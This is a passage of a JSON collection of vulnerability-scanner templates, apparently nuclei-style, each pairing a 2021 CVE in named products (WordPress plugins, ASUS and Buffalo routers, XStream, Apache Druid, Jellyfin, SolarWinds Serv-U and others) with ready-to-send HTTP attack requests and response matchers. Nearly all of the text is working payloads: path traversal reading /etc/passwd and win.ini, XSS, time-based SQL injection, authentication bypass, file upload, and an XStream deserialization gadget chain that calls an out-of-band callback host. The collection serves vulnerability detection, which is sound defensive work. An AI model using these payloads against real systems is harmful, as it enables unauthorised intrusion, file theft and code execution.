Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: 